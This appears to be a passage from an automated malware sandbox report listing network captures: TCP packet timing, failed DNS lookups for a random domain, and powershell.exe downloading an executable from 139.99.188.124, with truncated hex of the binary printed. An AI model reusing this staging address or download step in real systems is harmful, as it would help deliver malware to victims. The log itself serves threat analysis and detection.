                                                          Jan 2, 2025 10:55:01.522914886 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522923946 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522932053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522941113 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522953033 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.522960901 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.522978067 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523070097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523080111 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523122072 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523214102 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523224115 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523231983 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523240089 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523248911 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523257971 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523261070 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523266077 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523277044 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523298025 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523322105 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523483992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523499966 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523509026 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523518085 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523525953 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523535013 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523540974 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523545027 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523554087 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523561001 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523564100 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.523583889 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.523607969 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.598910093 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.598923922 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.598939896 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.598944902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.598953962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.598963022 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599071980 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599081993 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599118948 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599128008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599131107 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599131107 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599164963 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599164963 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599195957 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599216938 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599256992 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599304914 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599320889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599330902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599339962 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599364996 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599380016 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599581003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599591970 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599601984 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599606037 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599613905 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599622965 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599632025 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599639893 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599674940 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599852085 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599859953 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599874020 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599883080 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599890947 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599890947 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599900007 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599909067 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599917889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599920988 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599926949 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599936008 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.599946022 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.599967003 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600156069 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600163937 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600194931 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600302935 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600312948 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600321054 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600330114 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600338936 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600343943 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600347042 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600356102 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600363970 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600373030 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600374937 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600399017 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600419044 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600579977 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600589037 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600596905 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600625992 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600625992 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600637913 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600646019 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600656033 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600663900 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600708008 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600864887 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600874901 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600883961 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600903034 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600929022 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.600951910 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600961924 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600970030 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600979090 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600989103 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.600992918 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601016045 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601177931 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601217031 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601303101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601315022 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601324081 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601335049 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601344109 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601347923 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601353884 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601362944 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601371050 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601409912 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601586103 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601597071 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601605892 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601628065 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601640940 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601686001 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601696968 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601705074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601715088 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601725101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601735115 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601737022 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601744890 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601752996 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601754904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.601782084 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.601800919 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609222889 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609239101 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609287024 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609287977 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609297037 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609329939 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609366894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609376907 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609412909 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609432936 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609441996 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609477997 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609560966 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609571934 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609580994 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609591007 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609599113 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609608889 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609637976 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609683990 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609728098 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609743118 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609798908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609807014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609816074 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609839916 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609863043 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.609966993 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609975100 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609985113 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.609992981 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.610012054 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.610034943 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.610076904 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.610089064 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.610125065 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.633975029 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.633992910 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634001970 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634083986 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634119987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634144068 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.634144068 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.634190083 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634205103 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634212971 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634233952 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.634257078 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.634299994 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634309053 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634349108 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634371996 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.634433985 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634443998 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634452105 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634460926 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.634480000 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.634505033 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.675946951 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.685807943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.685827971 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.685837030 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.685873985 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.685966015 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.685975075 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.685982943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.685992956 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686009884 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686050892 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686094999 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686141968 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686161995 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686172009 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686180115 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686188936 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686198950 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686207056 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686208963 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686239958 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686260939 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686448097 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686456919 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686497927 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686508894 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686518908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686531067 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686538935 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686549902 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686554909 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686575890 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686753988 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686763048 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686772108 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686775923 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686789989 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686790943 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686800003 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686809063 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686817884 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.686817884 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.686863899 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687030077 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687076092 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687103987 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687115908 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687124014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687131882 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687141895 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687153101 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687190056 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687323093 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687335014 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687342882 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687352896 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687362909 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687367916 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687371969 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687381983 CET8049705139.99.188.124192.168.2.5
                                                          Jan 2, 2025 10:55:01.687406063 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.687434912 CET4970580192.168.2.5139.99.188.124
                                                          Jan 2, 2025 10:55:01.928092003 CET4970580192.168.2.5139.99.188.124

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 2, 2025 10:55:04.763775110 CET5910853192.168.2.51.1.1.1
                                                          Jan 2, 2025 10:55:04.774643898 CET53591081.1.1.1192.168.2.5
                                                          Jan 2, 2025 10:55:22.367465019 CET5398353192.168.2.51.1.1.1
                                                          Jan 2, 2025 10:55:22.376018047 CET53539831.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 2, 2025 10:55:04.763775110 CET192.168.2.51.1.1.10xb5b8Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                          Jan 2, 2025 10:55:22.367465019 CET192.168.2.51.1.1.10xead1Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 2, 2025 10:55:04.774643898 CET1.1.1.1192.168.2.50xb5b8Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                          Jan 2, 2025 10:55:22.376018047 CET1.1.1.1192.168.2.50xead1Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • 139.99.188.124

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549704139.99.188.124803752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2025 10:54:55.946582079 CET167OUTGET /TSKUVpnJ HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 139.99.188.124
                                                          Connection: Keep-Alive
                                                          Jan 2, 2025 10:54:56.815186977 CET1236INHTTP/1.1 200 OK
                                                          Date: Thu, 02 Jan 2025 09:54:56 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Mon, 16 Dec 2024 15:40:22 GMT
                                                          ETag: "da2a8-62964ffa303b5"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 893608
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                          Jan 2, 2025 10:54:56.815206051 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                          Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hC
                                                          Jan 2, 2025 10:54:56.815213919 CET1236INData Raw: 1e 02 00 59 c3 e8 8e 47 01 00 68 c7 b7 43 00 e8 c9 1e 02 00 59 c3 e8 e4 28 00 00 68 cc b7 43 00 e8 b8 1e 02 00 59 c3 e8 ac 34 01 00 68 d1 b7 43 00 e8 a7 1e 02 00 59 c3 b9 04 84 4c 00 e8 32 01 01 00 68 e0 b7 43 00 e8 91 1e 02 00 59 c3 cc cc cc cc
                                                          Data Ascii: YGhCY(hCY4hCYL2hCYSVWj[lKyNlN(V;Y_^[SV3Wj_NN(^^~^^^ ^$f^8NlF:^<^@FLFPFTFXF\F`Fdj
                                                          Jan 2, 2025 10:54:56.815218925 CET224INData Raw: 9c fc 00 00 89 5e 64 8b c6 89 5e 68 89 5e 70 89 5e 78 c7 46 7c 01 00 00 00 66 89 be 84 00 00 00 66 89 be 88 00 00 00 66 89 be 8a 00 00 00 66 89 be 8c 00 00 00 66 89 be 8e 00 00 00 89 be 9c 00 00 00 5f 89 9e 80 00 00 00 88 9e 98 00 00 00 c6 86 93
                                                          Data Ascii: ^d^h^p^xF|fffff_^[UVW3j9~t.YtuLFGFxF~_^]Ytu>V6:V4YY^USjccY
